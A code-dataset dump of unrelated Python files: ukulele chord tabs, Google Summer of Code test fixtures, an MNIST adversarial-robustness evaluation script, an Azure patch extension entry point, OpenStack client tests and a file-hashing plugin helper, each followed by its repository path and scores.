'E' : (2, 4, 4, 4),
'E7' : (1, 2, 0, 2),
'Em' : (0, 4, 3, 2),
'Em7' : (0, 2, 0, 2),
'Edim' : (0, 1, 0, 1),
'Eaug' : (1, 0, 0, 3),
'E6' : (1, 0, 2, 0),
'Emaj7' : (1, 3, 0, 2),
'E9' : (1, 2, 2, 2),
'F' : (2, 0, 1, 0),
'F7' : (2, 3, 1, 0),
'Fm' : (1, 0, 1, 3),
'Fm7' : (1, 3, 1, 3),
'Fdim' : (1, 2, 1, 2),
'Faug' : (2, 1, 1, 0),
'F6' : (2, 2, 1, 3),
'Fmaj7' : (2, 4, 1, 3),
'F9' : (2, 3, 3, 3),
'F#' : (3, 1, 2, 1),
'F#7' : (3, 4, 2, 4),
'F#m' : (2, 1, 2, 0),
'F#m7' : (2, 4, 2, 4),
'F#dim' : (2, 3, 2, 3),
'F#aug' : (4, 3, 2, 2),
'F#6' : (3, 3, 2, 4),
'F#maj7' : (0, 1, 1, 1),
'F#9' : (1, 1, 0, 1),
'G' : (0, 2, 3, 2),
'G7' : (0, 2, 1, 2),
'Gm' : (0, 2, 3, 1),
'Gm7' : (0, 2, 1, 1),
'Gdim' : (0, 1, 0, 1),
'Gaug' : (4, 3, 3, 2),
'G6' : (0, 2, 0, 2),
'Gmaj7' : (0, 2, 2, 2),
'G9' : (2, 2, 1, 2),
'G#' : (5, 3, 4, 3),
'G#7' : (1, 3, 2, 3),
'G#m' : (1, 3, 4, 2),
'G#m7' : (0, 3, 2, 2),
'G#dim' : (1, 2, 1, 2),
'G#aug' : (1, 0, 0, 2),
'G#6' : (1, 3, 1, 3),
'G#maj7' : (1, 3, 3, 3),
'G#9' : (3, 3, 2, 3),
'A' : (2, 1, 0, 0),
'A7' : (0, 1, 0, 0),
'Am' : (2, 0, 0, 0),
'Am7' : (0, 4, 3, 3),
'Adim' : (2, 3, 2, 3),
'Aaug' : (2, 1, 1, 1),
'A6' : (2, 4, 2, 4),
'Amaj7' : (1, 1, 0, 0),
'A9' : (0, 1, 0, 2),
'Bb' : (3, 2, 1, 1),
'Bb7' : (1, 2, 1, 1),
'Bbm' : (3, 1, 1, 1),
'Bbm7' : (1, 1, 1, 1),
'Bbdim' : (0, 1, 0, 1),
'Bbaug' : (3, 2, 2, 1),
'Bb6' : (0, 2, 1, 1),
'Bbmaj7': (3, 2, 1, 0),
'Bb9' : (1, 2, 1, 3),
'B' : (4, 3, 2, 2),
'B7' : (2, 3, 2, 2),
'Bm' : (4, 2, 2, 2),
'Bm7' : (2, 2, 2, 2),
'Bdim' : (1, 2, 1, 2),
'Baug' : (4, 3, 3, 2),
'B6' : (1, 3, 2, 2),
'Bmaj7' : (3, 3, 2, 2),
'B9' : (2, 3, 2, 4),
}
CHORDS = dict()
for chord in CHORD_TABS :
    CHORDS[chord] = get_chord(chord) | psox/ukulele.py | 0.361052 | 0.325789 |
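# --- Illustrative usage sketch (added note, not part of psox/ukulele.py above) ---
# Demonstrates what the lookup tables above produce. The import path is an assumption
# based on the repo layout (psox/ukulele.py) and may need adjusting.
from psox.ukulele import CHORDS, get_chord, get_note

print(get_note(0, 2))   # 'A4': string 0 is the G string, second fret
print(get_chord('C'))   # ('G4', 'C4', 'E4', 'C5') from the (0, 0, 0, 3) tab
print(CHORDS['Am'])     # CHORDS precomputes get_chord() for every CHORD_TABS entry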
__authors__ = [
'"Madhusudan.C.S" <<EMAIL>>',
]
from datetime import datetime
from datetime import timedelta
from google.appengine.ext import db
from google.appengine.api import users
from fixture import DataSet
class UserData(DataSet):
class all_admin:
key_name = '<EMAIL>'
link_id = 'super_admin'
account = users.User(email='<EMAIL>')
name = 'Super Admin'
is_developer = True
class site_admin:
key_name = 'site_admin'
link_id = 'site_admin'
account = users.User(email='<EMAIL>')
name = 'Site Admin'
class melange_admin_0001:
key_name = 'melange_admin_0001'
link_id = 'melange_admin_0001'
account = users.User(email='<EMAIL>')
name = 'Melange Admin 0001'
class melange_admin_0002:
key_name = 'melange_admin_0002'
link_id = 'melange_admin_0002'
account = users.User(email='<EMAIL>')
name = 'Melange Admin 0002'
class asf_admin_0001:
key_name = 'asf_admin_0001'
link_id = 'asf_admin_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Admin 0001'
class melange_mentor_0001:
key_name = 'melange_mentor_0001'
link_id = 'melange_mentor_0001'
account = users.User(email='<EMAIL>')
name = '<NAME>or 0001'
class melange_mentor_0002:
key_name = 'melange_mentor_0002'
link_id = 'melange_mentor_0002'
account = users.User(email='<EMAIL>')
name = '<NAME> 0002'
class asf_mentor_0001:
key_name = 'asf_mentor_0001'
link_id = 'asf_mentor_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Mentor 001'
class melange_student_0001:
key_name = 'melange_student_0001'
link_id = 'melange_student_0001'
account = users.User(email='<EMAIL>')
name = 'Melange Student 0001'
class melange_student_0002:
key_name = 'melange_student_0002'
link_id = 'melange_student_0002'
account = users.User(email='<EMAIL>')
name = 'Melange Student 0002'
class asf_student_0001:
key_name = 'asf_student_0001'
link_id = 'asf_student_0001'
account = users.User(email='<EMAIL>')
name = 'ASF Student 0001'
class public:
key_name = 'public'
link_id = 'public'
account = users.User(email='<EMAIL>')
name = 'Public'
class SiteData(DataSet):
class site:
key_name = 'site'
link_id = 'site'
class SponsorData(DataSet):
class google:
key_name = 'google'
link_id = 'google'
name = 'Google Inc.'
short_name = 'Google'
founder = UserData.site_admin
home_page = 'http://www.google.com'
email = '<EMAIL>'
description = 'This is the profile for Google.'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class HostData(DataSet):
class google:
key_name = 'google/test'
link_id = 'test'
scope = SponsorData.google
scope_path = 'google'
user = UserData.site_admin
given_name = 'Test'
surname = 'Example'
name_on_documents = '<NAME>'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class TimelineData(DataSet):
class gsoc2009:
key_name = 'google/gsoc2009'
link_id = 'gsoc2009'
scope_path = 'google'
scope = SponsorData.google
class GHOPTimelineData(DataSet):
class ghop2009:
key_name = 'google/ghop2009'
link_id = 'ghop2009'
scope_path = 'google'
scope = SponsorData.google
program_start = datetime.today() - timedelta(days=30)
program_end = datetime.today() + timedelta(days=30)
org_signup_start = datetime.today() + timedelta(days=25)
org_signup_end = datetime.today() + timedelta(days=25)
class ProgramData(DataSet):
class gsoc2009:
key_name = 'google/gsoc2009'
link_id = 'gsoc2009'
scope_path ='google'
scope = SponsorData.google
name = 'Google Summer of Code 2009'
short_name = 'GSoC 2009'
group_label = 'GSOC'
description = 'This is the program for GSoC 2009.'
apps_tasks_limit = 42
slots = 42
timeline = TimelineData.gsoc2009
status = 'visible'
class GHOPProgramData(DataSet):
class ghop2009:
key_name = 'google/ghop2009'
link_id = 'ghop2009'
scope_path ='google'
scope = SponsorData.google
name = 'Google Highly Open Participation Contest 2009'
short_name = 'GHOP 2009'
group_label = 'GHOP'
description = 'This is the program for GHOP 2009.'
apps_tasks_limit = 42
slots = 42
timeline = GHOPTimelineData.ghop2009
status = 'visible'
class OrgData(DataSet):
class melange_gsoc:
key_name = 'google/ghop2009/melange'
link_id = 'melange'
name = '<NAME>'
short_name = 'Melange'
scope_path = 'google/gsoc2009'
scope = ProgramData.gsoc2009
home_page = 'http://code.google.com/p/soc'
description = 'Melange, share the love!'
license_name = 'Apache License'
ideas = 'http://code.google.com/p/soc/issues'
founder = UserData.melange_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class GHOPOrganizationData(DataSet):
class melange_ghop:
key_name = 'google/ghop2009/melange'
link_id = 'melange'
name = 'Melange Development Team'
short_name = 'Melange'
scope_path = 'google/ghop2009'
scope = GHOPProgramData.ghop2009
home_page = 'http://code.google.com/p/soc'
description = 'Melange, share the love!'
license_name = 'Apache License'
ideas = 'http://code.google.com/p/soc/issues'
founder = UserData.melange_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
task_quota_limit = 100
class asf_ghop:
key_name = 'google/ghop2009/asf'
link_id = 'asf'
name = 'ASF Development Team'
short_name = 'ASF'
scope_path = 'google/ghop2009'
scope = GHOPProgramData.ghop2009
home_page = 'http://apache.org'
description = 'Apache Software Foundation'
license_name = 'Apache License'
ideas = 'http://apache.org/ideas'
founder = UserData.asf_admin_0001
email = '<EMAIL>'
contact_street = 'Some Street'
contact_city = 'Some City'
contact_country = 'United States'
contact_postalcode = '12345'
phone = '1-555-BANANA'
status = 'active'
class GHOPOrgAdminData(DataSet):
class melange:
key_name = 'google/ghop2009/melange/test'
link_id = 'test'
scope_path = 'google/ghop2009/melange'
scope = GHOPOrganizationData.melange_ghop
program = GHOPProgramData.ghop2009
user = UserData.melange_admin_0001
given_name = 'Test'
surname = 'Example'
name_on_documents = 'Test Example'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class GHOPMentorData(DataSet):
class melange:
key_name = 'google/ghop2009/melange/test'
link_id = 'test'
scope_path = 'google/ghop2009/melange'
scope = GHOPOrganizationData.melange_ghop
program = GHOPProgramData.ghop2009
user = UserData.melange_mentor_0001
given_name = 'Test'
surname = 'Example'
name_on_documents = 'Test Example'
email = '<EMAIL>'
res_street = 'Some Street'
res_city = 'Some City'
res_state = 'Some State'
res_country = 'United States'
res_postalcode = '12345'
phone = '1-555-BANANA'
birth_date = db.DateProperty.now()
agreed_to_tos = True
class GHOPStudentData(DataSet):
class melange_student_0001:
student_id = 'melange_student_0001'
key_name = GHOPProgramData.ghop2009.key_name + "/" + student_id
link_id = student_id
scope_path = GHOPProgramData.ghop2009.key_name
scope = GHOPProgramData.ghop2009
program = GHOPProgramData.ghop2009
user = UserData.melange_student_0001
given_name = 'Melange_Student'
surname = 'Melfam'
birth_date = db.DateProperty.now()
email = '<EMAIL>'
im_handle = 'melange_student_0001'
major = 'Aerospace Engineering'
name_on_documents = 'melstud0001'
res_country = 'United States'
res_city = 'Minnesota'
res_street = 'Good Street'
res_postalcode = '12345'
publish_location = True
blog = 'http://www.blog.com/'
home_page = 'http://www.homepage.com/'
photo_url = 'http://www.photosite.com/thumbnail.png'
ship_state = None
expected_graduation = 2009
school_country = 'United States'
school_name = 'St.Joseph School'
tshirt_size = 'XS'
tshirt_style = 'male'
degree = 'Undergraduate'
phone = '1650253000'
can_we_contact_you = True
program_knowledge = 'I heard about this program through a friend.'
class asf_student_0001:
student_id = 'asf_student_0001'
key_name = GHOPProgramData.ghop2009.key_name + "/" + student_id
link_id = student_id
scope_path = GHOPProgramData.ghop2009.key_name
scope = GHOPProgramData.ghop2009
program = GHOPProgramData.ghop2009
user = UserData.melange_student_0001
given_name = 'ASF_Student'
surname = 'Asffam'
birth_date = db.DateProperty.now()
email = '<EMAIL>'
im_handle = 'asf_student_0001'
major = 'Chemical Engineering'
name_on_documents = 'asfstud0001'
res_country = 'United States'
res_city = 'New York'
res_street = 'Jam Street'
res_postalcode = '452543'
publish_location = True
blog = 'http://www.hasblog.com/'
home_page = 'http://www.merahomepage.com/'
photo_url = 'http://www.clickphoto.com/thumbnail.png'
ship_state = None
expected_graduation = 2009
school_country = 'United States'
school_name = 'Benedict School'
tshirt_size = 'XXL'
tshirt_style = 'male'
degree = 'Undergraduate'
phone = '1650253000'
can_we_contact_you = True
        program_knowledge = 'From slashdot.org post last year.' | src/melange/src/tests/datasets.py | 0.336658 | 0.0745 |
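# --- Illustrative note (added, not part of the datasets.py fixtures above) ---
# The GHOP student fixtures build their datastore key names from the program key name
# plus the student id; reproducing the expression used above makes the layout explicit.
program_key_name = 'google/ghop2009'   # GHOPProgramData.ghop2009.key_name
student_id = 'melange_student_0001'
assert program_key_name + "/" + student_id == 'google/ghop2009/melange_student_0001'
# scope_path for the same fixture is simply the program key name, i.e. 'google/ghop2009'.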
import argparse
import logging
import sys
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import DataLoader, Dataset
from mnist_net import mnist_net
logger = logging.getLogger(__name__)
logging.basicConfig(
format='[%(asctime)s %(filename)s %(name)s %(levelname)s] - %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.DEBUG)
def clamp(X, lower_limit, upper_limit):
return torch.max(torch.min(X, upper_limit), lower_limit)
def attack_fgsm(model, X, y, epsilon):
delta = torch.zeros_like(X, requires_grad=True)
output = model(X + delta)
loss = F.cross_entropy(output, y)
loss.backward()
grad = delta.grad.detach()
delta.data = epsilon * torch.sign(grad)
return delta.detach()
def attack_pgd(model, X, y, epsilon, alpha, attack_iters, restarts):
max_loss = torch.zeros(y.shape[0]).cuda()
max_delta = torch.zeros_like(X).cuda()
for _ in range(restarts):
delta = torch.zeros_like(X).uniform_(-epsilon, epsilon).cuda()
delta.data = clamp(delta, 0-X, 1-X)
delta.requires_grad = True
for _ in range(attack_iters):
output = model(X + delta)
index = torch.where(output.max(1)[1] == y)[0]
if len(index) == 0:
break
loss = F.cross_entropy(output, y)
loss.backward()
grad = delta.grad.detach()
d = torch.clamp(delta + alpha * torch.sign(grad), -epsilon, epsilon)
d = clamp(d, 0-X, 1-X)
delta.data[index] = d[index]
delta.grad.zero_()
all_loss = F.cross_entropy(model(X+delta), y, reduction='none')
max_delta[all_loss >= max_loss] = delta.detach()[all_loss >= max_loss]
max_loss = torch.max(max_loss, all_loss)
return max_delta
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--batch-size', default=100, type=int)
parser.add_argument('--data-dir', default='../mnist-data', type=str)
parser.add_argument('--fname', type=str)
parser.add_argument('--attack', default='pgd', type=str, choices=['pgd', 'fgsm', 'none'])
parser.add_argument('--epsilon', default=0.3, type=float)
parser.add_argument('--attack-iters', default=50, type=int)
parser.add_argument('--alpha', default=1e-2, type=float)
parser.add_argument('--restarts', default=10, type=int)
parser.add_argument('--seed', default=0, type=int)
return parser.parse_args()
def main():
args = get_args()
logger.info(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
mnist_test = datasets.MNIST("../mnist-data", train=False, download=True, transform=transforms.ToTensor())
test_loader = torch.utils.data.DataLoader(mnist_test, batch_size=args.batch_size, shuffle=False)
model = mnist_net().cuda()
checkpoint = torch.load(args.fname)
model.load_state_dict(checkpoint)
model.eval()
total_loss = 0
total_acc = 0
n = 0
if args.attack == 'none':
with torch.no_grad():
for i, (X, y) in enumerate(test_loader):
X, y = X.cuda(), y.cuda()
output = model(X)
loss = F.cross_entropy(output, y)
total_loss += loss.item() * y.size(0)
total_acc += (output.max(1)[1] == y).sum().item()
n += y.size(0)
else:
for i, (X, y) in enumerate(test_loader):
X, y = X.cuda(), y.cuda()
if args.attack == 'pgd':
delta = attack_pgd(model, X, y, args.epsilon, args.alpha, args.attack_iters, args.restarts)
elif args.attack == 'fgsm':
delta = attack_fgsm(model, X, y, args.epsilon)
with torch.no_grad():
output = model(X + delta)
loss = F.cross_entropy(output, y)
total_loss += loss.item() * y.size(0)
total_acc += (output.max(1)[1] == y).sum().item()
n += y.size(0)
logger.info('Test Loss: %.4f, Acc: %.4f', total_loss/n, total_acc/n)
if __name__ == "__main__":
    main() | pytorch_ares/third_party/fast_adversarial/MNIST/evaluate_mnist.py | 0.57523 | 0.431105 |
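# --- Illustrative usage sketch (added, not part of evaluate_mnist.py above) ---
# A minimal helper showing how attack_pgd() above could be reused outside the CLI
# wrapper. It assumes a CUDA device, a trained model, and CUDA tensors X/y; the
# default values mirror the script's argparse defaults (epsilon=0.3, alpha=1e-2,
# 50 iterations, 10 restarts).
import torch

def pgd_accuracy(model, X, y, epsilon=0.3, alpha=1e-2, attack_iters=50, restarts=10):
    """Return the model's accuracy on the PGD-perturbed batch (X, y)."""
    delta = attack_pgd(model, X, y, epsilon, alpha, attack_iters, restarts)
    with torch.no_grad():
        output = model(X + delta)
    return (output.max(1)[1] == y).float().mean().item()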
import datetime
import os
import sys
from extension.src.ActionHandler import ActionHandler
from extension.src.EnvLayer import EnvLayer
from extension.src.EnvHealthManager import EnvHealthManager
from extension.src.RuntimeContextHandler import RuntimeContextHandler
from extension.src.TelemetryWriter import TelemetryWriter
from extension.src.file_handlers.JsonFileHandler import JsonFileHandler
from extension.src.file_handlers.CoreStateHandler import CoreStateHandler
from extension.src.file_handlers.ExtConfigSettingsHandler import ExtConfigSettingsHandler
from extension.src.file_handlers.ExtEnvHandler import ExtEnvHandler
from extension.src.file_handlers.ExtOutputStatusHandler import ExtOutputStatusHandler
from extension.src.file_handlers.ExtStateHandler import ExtStateHandler
from extension.src.local_loggers.Logger import Logger
from extension.src.ProcessHandler import ProcessHandler
from extension.src.Utility import Utility
from extension.src.Constants import Constants
def main(argv):
stdout_file_mirror = None
file_logger = None
logger = Logger()
telemetry_writer = TelemetryWriter(logger)
logger.telemetry_writer = telemetry_writer # Need to set telemetry_writer within logger to enable sending all logs to telemetry
try:
# initializing action handler
# args will have values install, uninstall, etc, as given in MsftLinuxPatchExtShim.sh in the operation var
cmd_exec_start_time = datetime.datetime.utcnow()
utility = Utility(logger)
runtime_context_handler = RuntimeContextHandler(logger)
json_file_handler = JsonFileHandler(logger)
ext_env_handler = ExtEnvHandler(json_file_handler)
env_layer = EnvLayer()
env_health_manager = EnvHealthManager(env_layer)
if ext_env_handler.handler_environment_json is not None and ext_env_handler.config_folder is not None:
config_folder = ext_env_handler.config_folder
if config_folder is None or not os.path.exists(config_folder):
logger.log_error("Config folder not found at [{0}].".format(repr(config_folder)))
exit(Constants.ExitCode.MissingConfig)
ext_config_settings_handler = ExtConfigSettingsHandler(logger, json_file_handler, config_folder)
core_state_handler = CoreStateHandler(config_folder, json_file_handler)
ext_state_handler = ExtStateHandler(config_folder, utility, json_file_handler)
ext_output_status_handler = ExtOutputStatusHandler(logger, utility, json_file_handler, ext_env_handler.status_folder)
process_handler = ProcessHandler(logger, env_layer, ext_output_status_handler)
action_handler = ActionHandler(logger, env_layer, telemetry_writer, utility, runtime_context_handler, json_file_handler, env_health_manager, ext_env_handler, ext_config_settings_handler, core_state_handler, ext_state_handler, ext_output_status_handler, process_handler, cmd_exec_start_time)
action_handler.determine_operation(argv[1])
else:
error_cause = "No configuration provided in HandlerEnvironment" if ext_env_handler.handler_environment_json is None else "Path to config folder not specified in HandlerEnvironment"
error_msg = "Error processing file. [File={0}] [Error={1}]".format(Constants.HANDLER_ENVIRONMENT_FILE, error_cause)
raise Exception(error_msg)
except Exception as error:
logger.log_error(repr(error))
return Constants.ExitCode.HandlerFailed
finally:
if stdout_file_mirror is not None:
stdout_file_mirror.stop()
if file_logger is not None:
file_logger.close()
if __name__ == '__main__':
    main(sys.argv) | src/extension/src/__main__.py | 0.285571 | 0.041269 |
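# --- Illustrative note (added, not part of the extension __main__.py above) ---
# main() reads the operation name from argv[1], as the in-code comment explains; the
# shim script mentioned there normally supplies it. A hypothetical direct invocation
# for local testing could look like:
#
#   python -m extension.src install
#
# which ultimately calls action_handler.determine_operation("install").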
from unittest import mock
from openstackclient.common import module as osc_module
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit import utils
# NOTE(dtroyer): module_1 must match the version list filter (not --all)
# currently == '*client*'
module_name_1 = 'fakeclient'
module_version_1 = '0.1.2'
module_name_2 = 'zlib'
module_version_2 = '1.1'
# module_3 match openstacksdk
module_name_3 = 'openstack'
module_version_3 = '0.9.13'
# module_4 match sub module of fakeclient
module_name_4 = 'fakeclient.submodule'
module_version_4 = '0.2.2'
# module_5 match private module
module_name_5 = '_private_module.lib'
module_version_5 = '0.0.1'
MODULES = {
module_name_1: fakes.FakeModule(module_name_1, module_version_1),
module_name_2: fakes.FakeModule(module_name_2, module_version_2),
module_name_3: fakes.FakeModule(module_name_3, module_version_3),
module_name_4: fakes.FakeModule(module_name_4, module_version_4),
module_name_5: fakes.FakeModule(module_name_5, module_version_5),
}
class TestCommandList(utils.TestCommand):
def setUp(self):
super(TestCommandList, self).setUp()
self.app.command_manager = mock.Mock()
self.app.command_manager.get_command_groups.return_value = [
'openstack.common'
]
self.app.command_manager.get_command_names.return_value = [
'limits show\nextension list'
]
# Get the command object to test
self.cmd = osc_module.ListCommand(self.app, None)
def test_command_list_no_options(self):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# TODO(bapalm): Adjust this when cliff properly supports
# handling the detection rather than using the hard-code below.
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
def test_command_list_with_group_not_found(self):
arglist = [
'--group', 'not_exist',
]
verifylist = [
('group', 'not_exist'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
self.assertEqual([], data)
def test_command_list_with_group(self):
arglist = [
'--group', 'common',
]
verifylist = [
('group', 'common'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
@mock.patch.dict(
'openstackclient.common.module.sys.modules',
values=MODULES,
clear=True,
)
class TestModuleList(utils.TestCommand):
def setUp(self):
super(TestModuleList, self).setUp()
# Get the command object to test
self.cmd = osc_module.ListModule(self.app, None)
def test_module_list_no_options(self):
arglist = []
verifylist = [
('all', False),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient and openstacksdk, but not regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertNotIn(module_name_2, columns)
self.assertNotIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data)
def test_module_list_all(self):
arglist = [
'--all',
]
verifylist = [
('all', True),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient, openstacksdk and regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertIn(module_name_2, columns)
self.assertIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data) | openstackclient/tests/unit/common/test_module.py | from unittest import mock
from openstackclient.common import module as osc_module
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit import utils
# NOTE(dtroyer): module_1 must match the version list filter (not --all)
# currently == '*client*'
module_name_1 = 'fakeclient'
module_version_1 = '0.1.2'
module_name_2 = 'zlib'
module_version_2 = '1.1'
# module_3 match openstacksdk
module_name_3 = 'openstack'
module_version_3 = '0.9.13'
# module_4 match sub module of fakeclient
module_name_4 = 'fakeclient.submodule'
module_version_4 = '0.2.2'
# module_5 match private module
module_name_5 = '_private_module.lib'
module_version_5 = '0.0.1'
MODULES = {
module_name_1: fakes.FakeModule(module_name_1, module_version_1),
module_name_2: fakes.FakeModule(module_name_2, module_version_2),
module_name_3: fakes.FakeModule(module_name_3, module_version_3),
module_name_4: fakes.FakeModule(module_name_4, module_version_4),
module_name_5: fakes.FakeModule(module_name_5, module_version_5),
}
class TestCommandList(utils.TestCommand):
def setUp(self):
super(TestCommandList, self).setUp()
self.app.command_manager = mock.Mock()
self.app.command_manager.get_command_groups.return_value = [
'openstack.common'
]
self.app.command_manager.get_command_names.return_value = [
'limits show\nextension list'
]
# Get the command object to test
self.cmd = osc_module.ListCommand(self.app, None)
def test_command_list_no_options(self):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# TODO(bapalm): Adjust this when cliff properly supports
# handling the detection rather than using the hard-code below.
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
def test_command_list_with_group_not_found(self):
arglist = [
'--group', 'not_exist',
]
verifylist = [
('group', 'not_exist'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
self.assertEqual([], data)
def test_command_list_with_group(self):
arglist = [
'--group', 'common',
]
verifylist = [
('group', 'common'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
collist = ('Command Group', 'Commands')
self.assertEqual(collist, columns)
datalist = ((
'openstack.common',
'limits show\nextension list'
),)
self.assertEqual(datalist, tuple(data))
@mock.patch.dict(
'openstackclient.common.module.sys.modules',
values=MODULES,
clear=True,
)
class TestModuleList(utils.TestCommand):
def setUp(self):
super(TestModuleList, self).setUp()
# Get the command object to test
self.cmd = osc_module.ListModule(self.app, None)
def test_module_list_no_options(self):
arglist = []
verifylist = [
('all', False),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient and openstacksdk, but not regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertNotIn(module_name_2, columns)
self.assertNotIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data)
def test_module_list_all(self):
arglist = [
'--all',
]
verifylist = [
('all', True),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Output xxxclient, openstacksdk and regular module, like: zlib
self.assertIn(module_name_1, columns)
self.assertIn(module_version_1, data)
self.assertIn(module_name_2, columns)
self.assertIn(module_version_2, data)
self.assertIn(module_name_3, columns)
self.assertIn(module_version_3, data)
# Filter sub and private modules
self.assertNotIn(module_name_4, columns)
self.assertNotIn(module_version_4, data)
self.assertNotIn(module_name_5, columns)
self.assertNotIn(module_version_5, data) | 0.487795 | 0.336944 |
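The tests above assume a module listing that, by default, shows only '*client*' packages plus the openstack SDK, hides submodules and private modules, and includes everything else only with --all. A minimal sketch of that filtering (not the actual python-openstackclient implementation) might look like:

import sys

def list_module_versions(show_all=False):
    """Collect top-level module versions the way the tests above expect."""
    versions = {}
    for name, module in sys.modules.items():
        if '.' in name or name.startswith('_'):
            continue  # skip submodules and private modules
        if not show_all and 'client' not in name and name != 'openstack':
            continue  # default view: only *client* modules and the SDK
        version = getattr(module, '__version__', None)
        if version is not None:
            versions[name] = version
    return versions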
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = "d01"
__email__ = "<EMAIL>"
__copyright__ = "Copyright (C) 2016, <NAME>"
__license__ = "MIT"
__version__ = "0.1.0"
__date__ = "2016-04-01"
# Created: 2016-03-27 15:12
import hashlib
from abc import ABCMeta
import threading
import os
import datetime
from paps.crowd import Plugin, PluginException
def get_file_hash(file_path, block_size=1024, hasher=None):
"""
Generate hash for given file
:param file_path: Path to file
:type file_path: str
:param block_size: Size of block to be read at once (default: 1024)
:type block_size: int
:param hasher: Use specific hasher, defaults to md5 (default: None)
:type hasher: _hashlib.HASH
:return: Hash of file
:rtype: str
"""
if hasher is None:
hasher = hashlib.md5()
with open(file_path, 'rb') as f:
while True:
buffer = f.read(block_size)
if len(buffer) <= 0:
break
hasher.update(buffer)
return hasher.hexdigest()
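# A minimal usage sketch of get_file_hash(), assuming a hypothetical "config.json" file;
# any hashlib-style object with update()/hexdigest() can be passed as hasher.
def _example_file_hash():
    return get_file_hash("config.json", block_size=4096, hasher=hashlib.sha256())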
class SettablePlugin(Plugin):
"""
    Abstract interface for a plugin that can use the settings plugin
"""
__metaclass__ = ABCMeta
def __init__(self, settings=None):
"""
Initialize object
:param settings: Settings to be passed for init (default: None)
:type settings: dict | None
:rtype: None
:raises TypeError: Controller missing
"""
if settings is None:
settings = {}
super(SettablePlugin, self).__init__(settings)
self._resource_path = settings.get('resource_path')
""" Path to the resource dir
:type _resource_path: str """
self._resource_file_types = settings.get(
'resource_file_types',
["html", "js", "css"]
)
""" List of acceptable file types (lower case)
:type _resource_file_types: list[str] """
self._resource_file_types = [
s.lower() for s in self._resource_file_types
]
